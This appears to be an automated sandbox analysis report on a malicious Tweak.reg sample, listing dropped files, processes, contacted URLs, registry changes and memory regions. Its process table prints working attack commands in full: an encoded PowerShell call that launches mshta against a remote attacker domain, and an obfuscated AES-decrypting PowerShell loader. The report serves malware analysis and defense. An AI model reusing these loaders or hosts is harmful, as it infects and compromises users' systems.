Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Tweak.reg
|
data
|
initial sample
|
||
C:\Users\user\AppData\Roaming\AutoIt3.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xe073f7d0, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\DonaldDuck[1]
|
PE32 executable (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1vvz2bcy.esf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4uxr2oyi.1lu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gthlxnz.qv5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agqxyxas.jlz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crqk20xl.oxo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5zq2dem.nks.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkqy3knp.b2r.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzrc3koz.1av.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqggwtie.xk4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zkrywyf5.con.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlrxjdq2.zt2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvo4rur4.22a.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\DesolateOxidant.a3x
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\DesolateOxidant.zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1O7BHFDGG86YGP2V2GV8.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4fa325.TMP
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VMFMTNSFZOPWJ6SRSJ9A.temp
|
data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 16 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\regedit.exe
|
"regedit.exe" "C:\Users\user\Desktop\Tweak.reg"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA
|
||
C:\Windows\System32\mshta.exe
|
"C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split
($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD
= [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D794355577548');$WkCTD.IV = New-Object
byte[] 16;$tcgVjsHd = $WkCTD.CreateDecryptor();$HeZGuqYHp = $tcgVjsHd.TransformFinalBlock($SQYQyiT, 0, $SQYQyiT.Length);$sMCijoeKV
= [System.Text.Encoding]::Utf8.GetString($HeZGuqYHp);$tcgVjsHd.Dispose();& $sMCijoeKV.Substring(0,3) $sMCijoeKV.Substring(3)
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA
|
||
C:\Windows\System32\mshta.exe
|
"C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split
($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD
= [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D794355577548');$WkCTD.IV = New-Object
byte[] 16;$tcgVjsHd = $WkCTD.CreateDecryptor();$HeZGuqYHp = $tcgVjsHd.TransformFinalBlock($SQYQyiT, 0, $SQYQyiT.Length);$sMCijoeKV
= [System.Text.Encoding]::Utf8.GetString($HeZGuqYHp);$tcgVjsHd.Dispose();& $sMCijoeKV.Substring(0,3) $sMCijoeKV.Substring(3)
|
||
C:\Users\user\AppData\Roaming\AutoIt3.exe
|
"C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x"
|
||
C:\Users\user\AppData\Roaming\AutoIt3.exe
|
"C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 4 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://pwsh2.pajamas-stoic-failing.lol/
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol
|
unknown
|
||
https://pwsh2.pa
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
|
188.114.96.3
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck.IE5
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck&Y
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck~
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckIE5P2
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckSSC:
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckw
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#&
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckn
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
https://aka.ms/pscore6
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckhF
|
unknown
|
||
https://www.autoitscript.com/autoit3/
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckorer
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckh
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckc
|
unknown
|
||
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DesolateOxidant.zip
|
188.114.96.3
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckY
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckC:
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckO
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckP
|
unknown
|
||
http://crl.micft.cMicRosof
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck...
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckL
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckF
|
unknown
|
||
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckH
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckE
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckRF
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckwF
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#IE5P2
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck2
|
unknown
|
||
http://crl.mic
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckrei
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck...)
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckLMEM
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
http://www.autoitscript.com/autoit3/X
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck)
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck9F
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#
|
unknown
|
||
http://crl.m
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckime
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#S
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#Z
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#==h
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck$global:?
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckhttps://pwsh2.pajamas-stoic-failing.lol
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckdeflate
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DesolateOxidant.zipp
|
unknown
|
||
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck...M/~
|
unknown
|
There are 62 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
pwsh2.pajamas-stoic-failing.lol
|
188.114.96.3
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
188.114.96.3
|
pwsh2.pajamas-stoic-failing.lol
|
European Union
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
|
MegaLIMLauncher
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 6 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
20566D31000
|
trusted library allocation
|
page read and write
|
||
7FFD9B3A0000
|
trusted library allocation
|
page read and write
|
||
1CAD6490000
|
heap
|
page read and write
|
||
1A5E4C74000
|
heap
|
page read and write
|
||
7FFD9B1B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B146000
|
trusted library allocation
|
page read and write
|
||
20566D60000
|
trusted library allocation
|
page read and write
|
||
1A5E5360000
|
trusted library allocation
|
page read and write
|
||
7DA8FFF000
|
stack
|
page read and write
|
||
1887C960000
|
trusted library allocation
|
page read and write
|
||
1CAD67E9000
|
heap
|
page read and write
|
||
20567B88000
|
heap
|
page read and write
|
||
1872620E000
|
heap
|
page read and write
|
||
187261F9000
|
heap
|
page read and write
|
||
1FD651F0000
|
trusted library allocation
|
page read and write
|
||
1CAD8C0A000
|
trusted library allocation
|
page read and write
|
||
2CA54FE000
|
unkown
|
page readonly
|
||
2056BC3E000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1A5EA21C000
|
trusted library allocation
|
page read and write
|
||
1CAD88F7000
|
heap
|
page read and write
|
||
187262B8000
|
heap
|
page read and write
|
||
1760C6CD000
|
trusted library allocation
|
page read and write
|
||
2056BE16000
|
trusted library allocation
|
page read and write
|
||
1CAD8E7C000
|
trusted library allocation
|
page read and write
|
||
14E4E0AF000
|
heap
|
page read and write
|
||
1FD64F34000
|
trusted library allocation
|
page read and write
|
||
20567AF6000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
14E33D75000
|
heap
|
page read and write
|
||
205679BE000
|
heap
|
page read and write
|
||
156B000
|
heap
|
page read and write
|
||
2056C060000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
289D7E000
|
stack
|
page read and write
|
||
1CAD8C09000
|
trusted library allocation
|
page read and write
|
||
1CAD8C1B000
|
trusted library allocation
|
page read and write
|
||
1CAD8C06000
|
trusted library allocation
|
page read and write
|
||
1B9A7F1C000
|
trusted library allocation
|
page read and write
|
||
1760A74A000
|
heap
|
page read and write
|
||
15CC000
|
heap
|
page read and write
|
||
39D5000
|
heap
|
page read and write
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1872629C000
|
heap
|
page read and write
|
||
7FFD9B520000
|
trusted library allocation
|
page execute and read and write
|
||
1A5E4D13000
|
heap
|
page read and write
|
||
20567AF4000
|
heap
|
page read and write
|
||
1CAD89C0000
|
heap
|
page read and write
|
||
7FFD9B380000
|
trusted library allocation
|
page read and write
|
||
1CAD6490000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD8DC0000
|
trusted library allocation
|
page read and write
|
||
18800006000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
18726295000
|
heap
|
page read and write
|
||
188010AB000
|
trusted library allocation
|
page read and write
|
||
1A5EA517000
|
heap
|
page read and write
|
||
1A5E551A000
|
heap
|
page read and write
|
||
7FFD9B2C0000
|
trusted library allocation
|
page read and write
|
||
3919000
|
heap
|
page read and write
|
||
205679F6000
|
heap
|
page read and write
|
||
1A5EA2F0000
|
trusted library allocation
|
page read and write
|
||
1A5E551A000
|
heap
|
page read and write
|
||
14E4DF70000
|
heap
|
page read and write
|
||
1887E7F0000
|
heap
|
page execute and read and write
|
||
28AC4E000
|
stack
|
page read and write
|
||
1CAD8C1E000
|
trusted library allocation
|
page read and write
|
||
1CAD89C0000
|
heap
|
page read and write
|
||
3D6B000
|
heap
|
page read and write
|
||
1B9A7D6F000
|
heap
|
page read and write
|
||
1484000
|
heap
|
page read and write
|
||
205679C7000
|
heap
|
page read and write
|
||
2056BE19000
|
trusted library allocation
|
page read and write
|
||
1CAD647D000
|
heap
|
page read and write
|
||
4480000
|
direct allocation
|
page read and write
|
||
1CAD88EA000
|
heap
|
page read and write
|
||
7FFD9B3B0000
|
trusted library allocation
|
page read and write
|
||
3AC0000
|
heap
|
page read and write
|
||
7FFD9B282000
|
trusted library allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1554000
|
heap
|
page read and write
|
||
20567990000
|
heap
|
page read and write
|
||
1CAD8D20000
|
trusted library allocation
|
page read and write
|
||
20567AAE000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1C2D42A4000
|
heap
|
page read and write
|
||
14E3805E000
|
trusted library allocation
|
page read and write
|
||
2056BC38000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
14E33EC0000
|
heap
|
page read and write
|
||
1CAD8CE0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B400000
|
trusted library allocation
|
page read and write
|
||
1CAD88ED000
|
heap
|
page read and write
|
||
7FFD9B290000
|
trusted library allocation
|
page read and write
|
||
7FFD9B2F0000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
7FFD9B330000
|
trusted library allocation
|
page read and write
|
||
205679C3000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
20567976000
|
heap
|
page read and write
|
||
1A5E4C90000
|
heap
|
page read and write
|
||
1CAD6481000
|
heap
|
page read and write
|
||
1CAD6498000
|
heap
|
page read and write
|
||
163A000
|
heap
|
page read and write
|
||
7FFD9B2B0000
|
trusted library allocation
|
page read and write
|
||
205679AE000
|
heap
|
page read and write
|
||
14E37E3E000
|
trusted library allocation
|
page read and write
|
||
7FFD9B330000
|
trusted library allocation
|
page read and write
|
||
188010BC000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
14E360E5000
|
trusted library allocation
|
page read and write
|
||
1A5EA350000
|
remote allocation
|
page read and write
|
||
1872621B000
|
heap
|
page read and write
|
||
7DA8EFE000
|
stack
|
page read and write
|
||
205679CC000
|
heap
|
page read and write
|
||
18726281000
|
heap
|
page read and write
|
||
2899DF000
|
stack
|
page read and write
|
||
1A5EA1BE000
|
trusted library allocation
|
page read and write
|
||
7DF4BCED0000
|
trusted library allocation
|
page execute and read and write
|
||
1CAD6806000
|
heap
|
page read and write
|
||
2056BC41000
|
heap
|
page read and write
|
||
1CAD63B5000
|
heap
|
page read and write
|
||
18726288000
|
heap
|
page read and write
|
||
165C000
|
heap
|
page read and write
|
||
1B9A76D0000
|
heap
|
page execute and read and write
|
||
15C2000
|
heap
|
page read and write
|
||
